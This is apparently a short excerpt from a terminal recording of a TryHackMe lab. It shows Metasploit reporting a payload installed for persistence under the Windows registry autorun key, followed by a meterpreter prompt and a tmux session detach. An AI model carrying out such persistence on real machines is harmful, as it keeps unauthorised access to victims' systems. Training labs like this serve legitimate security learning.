[132.045986, "o", "\u001b[32m\u001b[1m[+]\u001b(B\u001b[m Installed into autorun as HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\dNoRLFeKSa\r\n"]
[132.055017, "o", "\u001b[4mmeterpreter\u001b(B\u001b[m > "]
[135.017687, "o", "\u001b[?25l\u001b[30m\u001b[42m\u001b[55;1H[THM] 0:OpenVPN  1:notes  2:metasploit* 3:rdp-                                                                                                                                         \"kali\" 21:53 03-Aug-20\u001b(B\u001b[m\u001b[48;15H\u001b[?12l\u001b[?25h"]
[137.149568, "o", "\u001b[1;55r\u001b(B\u001b[m\u001b[?1l\u001b>\u001b[H\u001b[2J\u001b[?12l\u001b[?25h\u001b[?1000l\u001b[?1002l\u001b[?1003l\u001b[?1006l\u001b[?1005l\u001b[?1049l\u001b[23;0;0t"]
[137.151149, "o", "[detached (from session THM)]\r\n"]
